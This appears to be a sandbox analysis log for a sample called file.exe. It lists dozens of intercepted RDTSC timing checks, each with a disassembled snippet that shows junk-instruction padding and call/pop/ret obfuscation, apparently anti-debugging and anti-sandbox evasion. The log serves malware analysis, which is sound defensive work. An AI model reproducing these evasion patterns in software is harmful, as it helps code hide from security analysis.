              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CAB80E second address: CAB818 instructions: 0x00000000 rdtsc 0x00000002 je 00007F055C7C8332h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CAB94A second address: CAB94E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CAB94E second address: CAB979 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F055C7C8337h 0x00000007 jmp 00007F055C7C832Dh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push edi 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CAB979 second address: CAB97F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CAB97F second address: CAB98E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 js 00007F055C7C8326h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CAB98E second address: CAB992 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CABAF7 second address: CABB01 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F055C7C8326h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CABB01 second address: CABB10 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 pop edi 0x00000006 pushad 0x00000007 jl 00007F055D0637B6h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CABDA7 second address: CABDAD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CABDAD second address: CABDB1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CABDB1 second address: CABDC1 instructions: 0x00000000 rdtsc 0x00000002 je 00007F055C7C8326h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop esi 0x0000000b push esi 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f pop eax 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CABFFF second address: CAC01C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push edi 0x00000008 pop edi 0x00000009 jmp 00007F055D0637C2h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CAC01C second address: CAC024 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CAC024 second address: CAC02A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CAC02A second address: CAC030 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CAC030 second address: CAC036 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CAC036 second address: CAC040 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 pushad 0x00000007 push edi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CAC040 second address: CAC04E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push esi 0x00000006 jo 00007F055D0637B6h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7310E second address: C73112 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C73112 second address: C7311D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CAC1B7 second address: CAC1BD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CAC858 second address: CAC85E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CAC85E second address: CAC867 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CAC867 second address: CAC871 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F055D0637B6h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CAC871 second address: CAC87B instructions: 0x00000000 rdtsc 0x00000002 je 00007F055C7C8326h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CAC9F1 second address: CAC9FD instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CACB40 second address: CACB56 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F055C7C832Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b popad 0x0000000c pop eax 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CACB56 second address: CACB73 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 pop eax 0x00000005 jmp 00007F055D0637C1h 0x0000000a pop esi 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push ecx 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CACEB2 second address: CACEC1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jo 00007F055C7C832Eh 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CACEC1 second address: CACED3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 jl 00007F055D0637B6h 0x0000000b pop edi 0x0000000c popad 0x0000000d push ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CACED3 second address: CACEDD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F055C7C8326h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CACEDD second address: CACEE1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CAF4CA second address: CAF4D0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CAF4D0 second address: CAF4D4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CAF4D4 second address: CAF50D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push esi 0x0000000a jmp 00007F055C7C8339h 0x0000000f pop esi 0x00000010 mov eax, dword ptr [esp+04h] 0x00000014 jmp 00007F055C7C832Bh 0x00000019 mov eax, dword ptr [eax] 0x0000001b push edx 0x0000001c push ebx 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C74B85 second address: C74B8B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C74B8B second address: C74B94 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ecx 0x00000006 push edi 0x00000007 pop edi 0x00000008 pop ecx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CBB398 second address: CBB3C3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F055D0637BEh 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F055D0637C9h 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CBAC6C second address: CBAC7D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jmp 00007F055C7C832Ch 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CBAC7D second address: CBACA1 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F055D0637C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jo 00007F055D0637B6h 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CBACA1 second address: CBACBB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F055C7C832Ch 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jl 00007F055C7C8326h 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CBACBB second address: CBACBF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CBACBF second address: CBACCB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F055C7C8326h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CBAF72 second address: CBAF7C instructions: 0x00000000 rdtsc 0x00000002 jo 00007F055D0637BCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CBB0DF second address: CBB0E5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CBB0E5 second address: CBB0E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CBB0E9 second address: CBB0FE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F055C7C8331h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CBCCD7 second address: CBCCE9 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F055D0637B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop esi 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CBCCE9 second address: CBCCED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CBCCED second address: CBCCF3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC022C second address: CC0232 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC0232 second address: CC0238 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC0D04 second address: CC0D0A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC0D0A second address: CC0D0E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC0D0E second address: CC0D12 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC1704 second address: CC170A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC1FAD second address: CC1FB3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC383E second address: CC384F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F055D0637BDh 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC384F second address: CC3853 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC8DBF second address: CC8DC4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC8DC4 second address: CC8DE1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F055C7C8339h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CCA03D second address: CCA041 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CCA041 second address: CCA04B instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F055C7C832Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CCBCA7 second address: CCBD28 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop edi 0x00000006 push eax 0x00000007 jmp 00007F055D0637C9h 0x0000000c nop 0x0000000d jmp 00007F055D0637C8h 0x00000012 push 00000000h 0x00000014 mov di, E444h 0x00000018 jmp 00007F055D0637BAh 0x0000001d push 00000000h 0x0000001f push 00000000h 0x00000021 push edi 0x00000022 call 00007F055D0637B8h 0x00000027 pop edi 0x00000028 mov dword ptr [esp+04h], edi 0x0000002c add dword ptr [esp+04h], 00000015h 0x00000034 inc edi 0x00000035 push edi 0x00000036 ret 0x00000037 pop edi 0x00000038 ret 0x00000039 add ebx, dword ptr [ebp+122D2CE9h] 0x0000003f xchg eax, esi 0x00000040 push eax 0x00000041 push edx 0x00000042 jmp 00007F055D0637C0h 0x00000047 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CCCF3B second address: CCCF3F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CCCF3F second address: CCCF45 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CCCF45 second address: CCCFDF instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F055C7C8328h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jmp 00007F055C7C832Ah 0x00000010 nop 0x00000011 movzx edi, cx 0x00000014 push dword ptr fs:[00000000h] 0x0000001b push 00000000h 0x0000001d push ebp 0x0000001e call 00007F055C7C8328h 0x00000023 pop ebp 0x00000024 mov dword ptr [esp+04h], ebp 0x00000028 add dword ptr [esp+04h], 00000014h 0x00000030 inc ebp 0x00000031 push ebp 0x00000032 ret 0x00000033 pop ebp 0x00000034 ret 0x00000035 mov dword ptr [ebp+122D1C4Eh], edi 0x0000003b mov dword ptr [ebp+122D2D9Eh], esi 0x00000041 mov dword ptr fs:[00000000h], esp 0x00000048 mov ebx, 0CE471DFh 0x0000004d mov eax, dword ptr [ebp+122D119Dh] 0x00000053 push 00000000h 0x00000055 push edx 0x00000056 call 00007F055C7C8328h 0x0000005b pop edx 0x0000005c mov dword ptr [esp+04h], edx 0x00000060 add dword ptr [esp+04h], 0000001Dh 0x00000068 inc edx 0x00000069 push edx 0x0000006a ret 0x0000006b pop edx 0x0000006c ret 0x0000006d add edi, dword ptr [ebp+122D1A67h] 0x00000073 push FFFFFFFFh 0x00000075 mov dword ptr [ebp+122D2DE1h], edx 0x0000007b push eax 0x0000007c push eax 0x0000007d push edx 0x0000007e jp 00007F055C7C8328h 0x00000084 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CCCFDF second address: CCCFFB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F055D0637C8h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CCEEAA second address: CCEEAE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CCEEAE second address: CCEEB4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CCEEB4 second address: CCEF2D instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007F055C7C832Dh 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], eax 0x0000000e push 00000000h 0x00000010 push edx 0x00000011 call 00007F055C7C8328h 0x00000016 pop edx 0x00000017 mov dword ptr [esp+04h], edx 0x0000001b add dword ptr [esp+04h], 00000017h 0x00000023 inc edx 0x00000024 push edx 0x00000025 ret 0x00000026 pop edx 0x00000027 ret 0x00000028 mov dword ptr [ebp+122D1C1Bh], eax 0x0000002e movsx edi, cx 0x00000031 push 00000000h 0x00000033 push 00000000h 0x00000035 push edi 0x00000036 call 00007F055C7C8328h 0x0000003b pop edi 0x0000003c mov dword ptr [esp+04h], edi 0x00000040 add dword ptr [esp+04h], 00000019h 0x00000048 inc edi 0x00000049 push edi 0x0000004a ret 0x0000004b pop edi 0x0000004c ret 0x0000004d mov ebx, edx 0x0000004f push 00000000h 0x00000051 jmp 00007F055C7C832Dh 0x00000056 push eax 0x00000057 pushad 0x00000058 pushad 0x00000059 push ecx 0x0000005a pop ecx 0x0000005b push eax 0x0000005c push edx 0x0000005d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CCEF2D second address: CCEF36 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CCEF36 second address: CCEF3A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CCF058 second address: CCF067 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c push esi 0x0000000d pop esi 0x0000000e popad 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD102B second address: CD1030 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CCF067 second address: CCF0D4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F055D0637C2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a jc 00007F055D0637B6h 0x00000010 push dword ptr fs:[00000000h] 0x00000017 pushad 0x00000018 or dword ptr [ebp+124557EDh], edx 0x0000001e mov edx, dword ptr [ebp+122D27CAh] 0x00000024 popad 0x00000025 mov dword ptr fs:[00000000h], esp 0x0000002c jmp 00007F055D0637C6h 0x00000031 mov eax, dword ptr [ebp+122D0EBDh] 0x00000037 add edi, dword ptr [ebp+122D29B9h] 0x0000003d push FFFFFFFFh 0x0000003f movzx edi, ax 0x00000042 add edi, dword ptr [ebp+122D1AA5h] 0x00000048 push eax 0x00000049 push ecx 0x0000004a pushad 0x0000004b pushad 0x0000004c popad 0x0000004d push eax 0x0000004e push edx 0x0000004f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD21F3 second address: CD21F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD21F7 second address: CD2213 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F055D0637C8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD2213 second address: CD22AF instructions: 0x00000000 rdtsc 0x00000002 jl 00007F055C7C8328h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d push 00000000h 0x0000000f push ecx 0x00000010 call 00007F055C7C8328h 0x00000015 pop ecx 0x00000016 mov dword ptr [esp+04h], ecx 0x0000001a add dword ptr [esp+04h], 0000001Bh 0x00000022 inc ecx 0x00000023 push ecx 0x00000024 ret 0x00000025 pop ecx 0x00000026 ret 0x00000027 movzx edi, cx 0x0000002a add dword ptr [ebp+122D2CEFh], ebx 0x00000030 push 00000000h 0x00000032 and di, 0120h 0x00000037 push 00000000h 0x00000039 push 00000000h 0x0000003b push edi 0x0000003c call 00007F055C7C8328h 0x00000041 pop edi 0x00000042 mov dword ptr [esp+04h], edi 0x00000046 add dword ptr [esp+04h], 00000017h 0x0000004e inc edi 0x0000004f push edi 0x00000050 ret 0x00000051 pop edi 0x00000052 ret 0x00000053 mov bl, 22h 0x00000055 mov dword ptr [ebp+122D2576h], ecx 0x0000005b xchg eax, esi 0x0000005c jmp 00007F055C7C8337h 0x00000061 push eax 0x00000062 push eax 0x00000063 push edx 0x00000064 push eax 0x00000065 jmp 00007F055C7C8336h 0x0000006a pop eax 0x0000006b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD3413 second address: CD341D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD0215 second address: CD022B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F055C7C8332h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD1219 second address: CD1220 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD250E second address: CD2519 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD5419 second address: CD541F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD541F second address: CD5425 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD5425 second address: CD5429 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD2519 second address: CD251D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD251D second address: CD253B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F055D0637C2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e pushad 0x0000000f popad 0x00000010 pop eax 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD253B second address: CD2541 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD4558 second address: CD4562 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F055D0637B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD6278 second address: CD6282 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F055C7C8326h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD6282 second address: CD6287 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
